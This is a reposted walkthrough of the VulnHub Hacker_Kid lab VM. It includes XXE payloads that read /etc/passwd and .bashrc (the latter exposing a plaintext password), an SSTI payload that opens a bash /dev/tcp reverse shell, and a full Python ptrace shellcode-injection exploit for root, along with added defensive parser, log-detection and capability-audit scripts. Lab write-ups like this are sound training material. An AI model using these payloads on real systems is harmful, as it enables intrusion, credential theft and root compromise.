Hacker_Kid Lab Walkthrough

admin, 2023-10-13 02:11:50

Lab download address:

https://download.vulnhub.com/hackerkid/Hacker_Kid-v1.0.1.ova

Information Gathering

1. Scanning with Nmap

    nmap -sP 192.168.106.0/24          # host discovery on the lab subnet to find the target's address
    nmap -T4 -A -p- 192.168.106.129    # full port scan of the target

2. Web Service Probing

The scan shows that the target has ports 53, 80 and 9999 open. The web page hints at using dig, and visiting it reveals a PHP environment.

Viewing the page source reveals a comment hinting that the page takes a GET parameter named page_no. Fuzzing this parameter, a new page appears when it is set to 21: http://192.168.106.129/index.php?page_no=21

This page reveals a domain name, hackers.blackhat.local. After binding it in the hosts file and visiting it, the page shows no change.

Next, test for a DNS zone transfer weakness:

    dig axfr @192.168.106.129 blackhat.local

This reveals more names: mail.blackhat.local, hackerkid.blackhat.local, hacker.blackhat.local, blackhat.local and www.blackhat.local. Add them all to the hosts file.

Visiting these reveals a new page. Capturing the registration request shows that the data is sent as XML, so we test for an XXE vulnerability with:

    <!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>

Testing confirms the XXE vulnerability. From /etc/passwd we see that root and saket have login shells. Next, a PHP wrapper is used to read /home/saket/.bashrc:

    <!DOCTYPE foo [<!ENTITY xxe SYSTEM 'php://filter/convert.base64-encode/resource=/home/saket/.bashrc'>]>

.bashrc is a shell script in the home directory that stores the user's personal settings; bash loads it every time it starts and configures the current shell's settings and environment from it. The decoded file:

    # ~/.bashrc: executed by bash(1) for non-login shells.
    # see /usr/share/doc/bash/examples/startup-files (in the package bash-doc) for examples
    # If not running interactively, don't do anything
    case $- in *i*) ;; *) return;; esac
    # don't put duplicate lines or lines starting with space in the history. See bash(1) for more options
    HISTCONTROL=ignoreboth
    # append to the history file, don't overwrite it
    shopt -s histappend
    # for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
    HISTSIZE=1000
    HISTFILESIZE=2000
    # check the window size after each command and, if necessary, update the values of LINES and COLUMNS.
    shopt -s checkwinsize
    # If set, the pattern "**" used in a pathname expansion context will match all files
    # and zero or more directories and subdirectories.
    #shopt -s globstar
    # make less more friendly for non-text input files, see lesspipe(1)
    [ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"
    # set variable identifying the chroot you work in (used in the prompt below)
    if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; then debian_chroot=$(cat /etc/debian_chroot); fi
    # set a fancy prompt (non-color, unless we know we "want" color)
    case "$TERM" in xterm-color|*-256color) color_prompt=yes;; esac
    # uncomment for a colored prompt, if the terminal has the capability; turned off by default to not
    # distract the user: the focus in a terminal window should be on the output of commands, not on the prompt
    #force_color_prompt=yes
    if [ -n "$force_color_prompt" ]; then
        # We have color support; assume it's compliant with Ecma-48 (ISO/IEC-6429). (Lack of such
        # support is extremely rare, and such a case would tend to support setf rather than setaf.)
        if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then color_prompt=yes; else color_prompt=; fi
    fi
    if [ "$color_prompt" = yes ]; then
        PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
    else
        PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
    fi
    unset color_prompt force_color_prompt
    # If this is an xterm set the title to user@host:dir
    case "$TERM" in xterm*|rxvt*) PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1" ;; *) ;; esac
    # enable color support of ls and also add handy aliases
    if [ -x /usr/bin/dircolors ]; then
        test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
        alias ls='ls --color=auto'
        #alias dir='dir --color=auto'
        #alias vdir='vdir --color=auto'
        alias grep='grep --color=auto'
        alias fgrep='fgrep --color=auto'
        alias egrep='egrep --color=auto'
    fi
    # colored GCC warnings and errors
    #export GCC_COLORS='error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01'
    # some more ls aliases
    alias ll='ls -alF'
    alias la='ls -A'
    alias l='ls -CF'
    # Add an "alert" alias for long running commands. Use like so:  sleep 10; alert
    alias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal || echo error)" "$(history|tail -n1|sed -e '\''s/^\s*[0-9]\+\s*//;s/[;&|]\s*alert$//'\'')"'
    # Alias definitions. You may want to put all your additions into a separate file like
    # ~/.bash_aliases, instead of adding them here directly. See /usr/share/doc/bash-doc/examples in the bash-doc package.
    if [ -f ~/.bash_aliases ]; then . ~/.bash_aliases; fi
    # enable programmable completion features (you don't need to enable this, if it's already
    # enabled in /etc/bash.bashrc and /etc/profile sources /etc/bash.bashrc).
    if ! shopt -oq posix; then
        if [ -f /usr/share/bash-completion/bash_completion ]; then . /usr/share/bash-completion/bash_completion
        elif [ -f /etc/bash_completion ]; then . /etc/bash_completion
        fi
    fi
    #Setting Password for running python app
    username="admin"
    password="Saket!#$%@!!"
This gives us a username and password. Logging in to http://192.168.106.129:9999 as admin fails; trying the other user seen in the /etc/passwd read earlier, saket, succeeds.
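A server-side fix for the XXE issue exploited above, written as an added example (not code from the walkthrough or the lab): the registration body is parsed with the standard-library expat parser, and any DOCTYPE or entity declaration aborts the parse, so the file:// and php://filter entities shown above never resolve. The sample bodies are constructed.

```python
import xml.parsers.expat

# Constructed sample bodies (not captured from the lab). XXE_BODY has the same
# DOCTYPE/external-entity shape as the payload used in the walkthrough.
SAFE_BODY = b"<register><name>saket</name><tel>123</tel><email>s@blackhat.local</email></register>"
XXE_BODY = (b"<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>"
            b"<register><name>&xxe;</name><tel>1</tel><email>a@b.local</email></register>")


class DtdNotAllowed(ValueError):
    """Raised when the body carries a DTD; a registration form never needs one."""


def parse_registration(body):
    """Return {field: text} for the leaf elements, refusing any DTD."""
    fields, stack = {}, []
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdNotAllowed("DOCTYPE declarations are not accepted")

    def on_entity_decl(*_):
        raise DtdNotAllowed("entity declarations are not accepted")

    def on_start(tag, attrs):
        stack.append(tag)
        fields.setdefault(tag, "")

    def on_chars(data):
        fields[stack[-1]] += data

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.StartElementHandler = on_start
    parser.EndElementHandler = lambda tag: stack.pop()
    parser.CharacterDataHandler = on_chars
    # No ExternalEntityRefHandler is installed, so expat never fetches SYSTEM ids either.
    parser.Parse(body, True)
    fields.pop("register", None)  # drop the wrapper element, keep the leaves
    return fields


def rejects_dtd(body):
    """True if parse_registration refuses the body because it carries a DTD."""
    try:
        parse_registration(body)
    except DtdNotAllowed:
        return True
    return False
```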

Following the hint, test whether a name parameter exists. Visiting http://192.168.106.129:9999/?name=1 in the browser confirms that it does.

Testing the name parameter reveals a Server-Side Template Injection (SSTI) vulnerability. The usual catch-all probes were used:

    {{1+abcxyz}}    ${1+abcxyz}    <%1+abcxyz%>    [abcxyz]

For Python: {{1+abcxyz}}; for PHP: ${1+abcxyz}; for Java: <%1+abcxyz%>.

Construct the reverse shell command:

    {% import os %}{{os.system('bash -c "bash -i >& /dev/tcp/192.168.106.128/4567 0>&1"')}}

URL-encode it before sending, listen locally on port 4567, and a shell comes back.
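Detection logic for the probing step above, as an added example (not part of the original writeup): it walks constructed access-log lines, decodes each query parameter and flags the four template syntaxes the walkthrough tests, escalating to high severity when the value also carries code-execution keywords such as import or os.system.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed access-log lines (Common Log Format); not captured from the lab.
SAMPLE_LOG = """\
192.168.106.128 - - [13/Oct/2023:02:11:50 +0000] "GET /?name=saket HTTP/1.1" 200 512
192.168.106.128 - - [13/Oct/2023:02:12:01 +0000] "GET /?name=%7B%7B1%2Babcxyz%7D%7D HTTP/1.1" 200 512
192.168.106.128 - - [13/Oct/2023:02:12:05 +0000] "GET /?name=%24%7B1%2Babcxyz%7D HTTP/1.1" 200 512
192.168.106.128 - - [13/Oct/2023:02:12:09 +0000] "GET /?name=%3C%251%2Babcxyz%25%3E HTTP/1.1" 200 512
192.168.106.128 - - [13/Oct/2023:02:13:30 +0000] "GET /?name=%7B%25%20import%20os%20%25%7D%7B%7Bos.system HTTP/1.1" 200 512
10.0.0.5 - - [13/Oct/2023:02:14:00 +0000] "GET /?name=O%27Brien HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+"')

# Template syntaxes the walkthrough probes with; matched against the decoded parameter value.
PROBES = [
    ("jinja/twig expression", re.compile(r"\{\{.*?\}\}")),
    ("jinja statement block", re.compile(r"\{%.*?%\}")),
    ("freemarker/velocity/php expression", re.compile(r"\$\{.*?\}")),
    ("jsp/erb scriptlet", re.compile(r"<%.*?%>")),
]
# Keywords that turn a syntax probe into an execution attempt.
DANGEROUS = re.compile(r"\b(import|os\.|system|popen|subprocess|__class__|__globals__)\b")


def classify_value(value):
    """Return (reason, severity) if the decoded value looks like an SSTI probe, else None."""
    for reason, pattern in PROBES:
        if pattern.search(value):
            severity = "high" if DANGEROUS.search(value) else "medium"
            return reason, severity
    return None


def scan_access_log(text):
    """Return (ip, timestamp, param, decoded value, reason, severity) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        query = urlsplit(match.group("target")).query
        for key, value in parse_qsl(query, keep_blank_values=True):
            value = unquote(value)  # parse_qsl decoded once; a second pass catches double encoding
            hit = classify_value(value)
            if hit:
                hits.append((match.group("ip"), match.group("ts"), key, value, hit[0], hit[1]))
    return hits
```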


3. Privilege Escalation

Search the filesystem for files with capabilities set:

    /sbin/getcap -r / 2>/dev/null

python2.7 turns out to carry cap_sys_ptrace+ep. Then list the programs running as root:

    ps -ef | grep root

Use the following script (exp.py, Python 2) to escalate privileges:

    import ctypes
    import sys
    import struct

    # Macros defined in <sys/ptrace.h>
    # https://code.woboq.org/qt5/include/sys/ptrace.h.html
    PTRACE_POKETEXT = 4
    PTRACE_GETREGS = 12
    PTRACE_SETREGS = 13
    PTRACE_ATTACH = 16
    PTRACE_DETACH = 17

    # Structure defined in <sys/user.h>
    # https://code.woboq.org/qt5/include/sys/user.h.html#user_regs_struct
    class user_regs_struct(ctypes.Structure):
        _fields_ = [(reg, ctypes.c_ulonglong) for reg in (
            "r15", "r14", "r13", "r12", "rbp", "rbx", "r11", "r10", "r9", "r8",
            "rax", "rcx", "rdx", "rsi", "rdi", "orig_rax", "rip", "cs", "eflags",
            "rsp", "ss", "fs_base", "gs_base", "ds", "es", "fs", "gs")]

    libc = ctypes.CDLL("libc.so.6")
    pid = int(sys.argv[1])

    # Define argument type and response type.
    libc.ptrace.argtypes = [ctypes.c_uint64, ctypes.c_uint64, ctypes.c_void_p, ctypes.c_void_p]
    libc.ptrace.restype = ctypes.c_uint64

    # Attach to the process
    libc.ptrace(PTRACE_ATTACH, pid, None, None)
    registers = user_regs_struct()

    # Retrieve the value stored in registers
    libc.ptrace(PTRACE_GETREGS, pid, None, ctypes.byref(registers))
    print("Instruction Pointer: " + hex(registers.rip))
    print("Injecting Shellcode at: " + hex(registers.rip))

    # Shell code copied from exploit db. https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c
    shellcode = ("\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02"
                 "\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05"
                 "\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb"
                 "\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05")

    # Inject the shellcode into the running process byte by byte.
    for i in xrange(0, len(shellcode), 4):
        # Convert the byte to little endian.
        shellcode_byte_int = int(shellcode[i:4+i].encode('hex'), 16)
        shellcode_byte_little_endian = struct.pack("<I", shellcode_byte_int).rstrip('\x00').encode('hex')
        shellcode_byte = int(shellcode_byte_little_endian, 16)
        # Inject the byte.
        libc.ptrace(PTRACE_POKETEXT, pid, ctypes.c_void_p(registers.rip + i), shellcode_byte)

    print("Shellcode Injected!!")

    # Modify the instruction pointer
    registers.rip = registers.rip + 2

    # Set the registers
    libc.ptrace(PTRACE_SETREGS, pid, None, ctypes.byref(registers))
    print("Final Instruction Pointer: " + hex(registers.rip))

    # Detach from the process.
    libc.ptrace(PTRACE_DETACH, pid, None, None)
Run it against the PID of a root-owned process:

    python2.7 exp.py 934

After a successful injection, the shellcode starts a listener on TCP port 5600. Check the listening ports on the target, then connect:

    nc 192.168.106.129 5600

This yields a root shell.
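An audit script for the capability finding above, added here and not part of the original writeup: it parses getcap -r output in both the older "path = caps+flags" and the newer "path caps=flags" formats, flags interpreters that carry any file capability and root-equivalent capabilities generally, and notes that cap_sys_ptrace is only stopped by Yama ptrace_scope=3. The sample getcap output is constructed; on a live host feed it the real output of /sbin/getcap -r / 2>/dev/null and the value of /proc/sys/kernel/yama/ptrace_scope.

```python
import re

# Constructed sample of `getcap -r / 2>/dev/null` output, covering both libcap
# output styles (older "path = caps+flags" and newer "path caps=flags").
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.7 = cap_sys_ptrace+ep
/usr/bin/gst-ptp-helper cap_net_bind_service,cap_sys_nice=ep
"""

LINE_RE = re.compile(r"^(?P<path>\S+)\s*(?:=\s*(?P<old>\S+)|(?P<new>\S+=\S+))$")
INTERPRETERS = re.compile(r"/(python[0-9.]*|perl[0-9.]*|ruby[0-9.]*|node|php[0-9.]*)$")
# Well-known capabilities that on their own let a local user reach root.
ROOT_EQUIVALENT = {"cap_sys_ptrace", "cap_sys_admin", "cap_sys_module",
                   "cap_setuid", "cap_dac_override", "cap_dac_read_search"}


def parse_getcap(text):
    """Return {path: set(capability names)} from getcap -r output."""
    result = {}
    for line in text.splitlines():
        match = LINE_RE.match(line.strip())
        if not match:
            continue
        caps_field = match.group("old") or match.group("new")
        # "cap_a,cap_b+ep" or "cap_a,cap_b=ep": strip the flag suffix, split the names
        names = re.split(r"[+=]", caps_field, maxsplit=1)[0]
        result[match.group("path")] = {c.strip() for c in names.split(",") if c.strip()}
    return result


def audit(getcap_text, ptrace_scope):
    """Return (path, finding) pairs; ptrace_scope is /proc/sys/kernel/yama/ptrace_scope."""
    findings = []
    for path, caps in parse_getcap(getcap_text).items():
        risky = caps & ROOT_EQUIVALENT
        if INTERPRETERS.search(path) and caps:
            # An interpreter with any capability hands it to arbitrary user code.
            findings.append((path, "interpreter carries file capabilities: " + ",".join(sorted(caps))))
        elif risky:
            findings.append((path, "root-equivalent capability: " + ",".join(sorted(risky))))
        if "cap_sys_ptrace" in caps and ptrace_scope < 3:
            # Yama levels 1 and 2 exempt CAP_SYS_PTRACE holders; only level 3 refuses every attach.
            findings.append((path, "cap_sys_ptrace bypasses Yama ptrace_scope=%d; only 3 blocks attach" % ptrace_scope))
    return findings
```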

Originally published on the WeChat public account 渗透笔记 (Penetration Notes): Hacker_Kid Lab Walkthrough

Reposted at CN-SEC 中文网: http://cn-sec.com/archives/2496846.html